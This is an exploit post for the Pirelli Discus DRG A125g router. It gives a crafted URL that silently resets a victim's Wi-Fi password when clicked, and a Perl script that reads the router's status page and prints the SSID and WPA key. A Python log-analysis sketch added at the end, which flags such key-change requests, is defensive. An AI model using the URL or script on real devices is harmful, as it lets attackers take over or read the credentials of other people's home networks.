Pirelli Discus DRG A125g Remote Wifi Password Change 2013/11/23

Pirelli Discus DRG A125g suffers from a remote wifi password change vulnerability.

  1. Mr. Penguin
    Authored by Sebastian Magof
    Code:
        # Exploit Title: Pirelli Discus DRG A125g remote change wifi password vulnerability
        # Hardware: Pirelli Discus DRG A125g
        # Date: 2013/11/23
        # Exploit Author: Sebastián Magof
        # Tested on: Linux/Windows
        # Twitter: @smagof
        # Greetz: Family, friends && under guys.
        # Special Greetz:
        # (\/)
        # (**) αlpha
        #(")(")
        #Exploit: http://10.0.0.2/wladv.wl?wlSsidIdx=0&wlHide=0&wlAuthMode=psk2&wlAuth=0&wlWep=disabled&wlWpaPsk=PASSWORDHERE&wlWpaGtkRekey=0&wlKeyBit=1&wlPreauth=1&wlWpa=tkip
        #info: the parameter wlWpaPsk=PASSWORDHERE is where we enter the password we want to set
        #      on the victim's wifi. If the victim clicks on the URL, their modem/router will reboot
        #      automatically with the new password provided by the attacker.
    Code:
        #!/usr/bin/perl
        #Author: Sebastián Magof
        #Hardware: pirelli discus DRG A125g
        #Vulnerable file: wlbasic.html
        #Bug: Wifi Password Disclosure
        #Type: Local
        # (\/)
        # (**) ±
        #(")(")
        #usage:perl exploit.pl
        use LWP::UserAgent;
        use HTTP::Request;
        #begin
        print "\n\n************************************************************\n";
        print "* Pirelli Discus ADSL DRG A125g Wifi password disclosure *\n";
        print "************************************************************\n\n";
        #wifi pwd disclosure file
        my $url = "http://10.0.0.2/wlbasic.html";
        #UserAgent
        my $ua = LWP::UserAgent->new();
        $ua->agent("Mozilla/5.0");
        #Request.
        my $req = HTTP::Request->new(GET => $url);
        my $request = $ua->request($req);
        my $content = $request->content();
        #content
        my ($ssi) = $content =~ m/ssid = '(.+)'/;
        my ($pwd) = $content =~ m/wpaPskKey = '(.+)'/;
        my ($enc) = $content =~ m/var wpa = '(.+)'/;
        #ssid+encryption method+pwd;
        print "Ssid: $ssi\n";
        print "Encryption method: $enc\n";
        print "Password: $pwd\n\n";
        exit(0);
        __EOF__
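Because the URL in the advisory changes the Wi-Fi key with a single GET request, such requests can be spotted in web-proxy logs. The sketch below is an added example, not part of the original post or the author's code; the log layout, the function name and the sample lines are assumptions constructed for illustration, while the host, path and parameter name come from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed (hypothetical) proxy log layout: client "METHOD URL" "Referer"
LINE_RE = re.compile(
    r'^(?P<client>\S+) "(?P<method>[A-Z]+) (?P<url>\S+)" "(?P<referer>[^"]*)"$'
)

ROUTER_HOST = "10.0.0.2"    # management address shown in the advisory
CONFIG_PATH = "/wladv.wl"   # endpoint shown in the advisory
SECRET_PARAM = "wlWpaPsk"   # parameter that carries the new passphrase


def find_psk_change_requests(lines):
    """Return one finding per GET request that sets the WPA key via the URL."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["method"] != "GET":
            continue
        url = urlsplit(m["url"])
        if url.hostname != ROUTER_HOST or url.path != CONFIG_PATH:
            continue
        if SECRET_PARAM not in parse_qs(url.query, keep_blank_values=True):
            continue
        # hostname is None when the Referer is "-" or empty
        ref_host = urlsplit(m["referer"]).hostname
        findings.append({
            "client": m["client"],
            # Not sent from the router's own pages: the request was triggered elsewhere.
            "cross_site": ref_host != ROUTER_HOST,
            "referer": m["referer"],
        })
    return findings


# Constructed sample lines, not taken from a real device or proxy.
SAMPLE_LOG = [
    '192.168.1.20 "GET http://10.0.0.2/wlbasic.html" "-"',
    '192.168.1.20 "GET http://10.0.0.2/wladv.wl?wlAuthMode=psk2&wlWpaPsk=REDACTED" "http://forum.example/t/1"',
    '192.168.1.31 "GET http://10.0.0.2/wladv.wl?wlAuthMode=psk2&wlWpaPsk=REDACTED" "http://10.0.0.2/wlbasic.html"',
    '192.168.1.31 "GET http://10.0.0.2/wladv.wl" "http://10.0.0.2/wlbasic.html"',
]

if __name__ == "__main__":
    for finding in find_psk_change_requests(SAMPLE_LOG):
        print(finding)
```

A finding with `cross_site` set to true means the key change was requested from a page other than the router's own interface, which is the pattern the advisory describes.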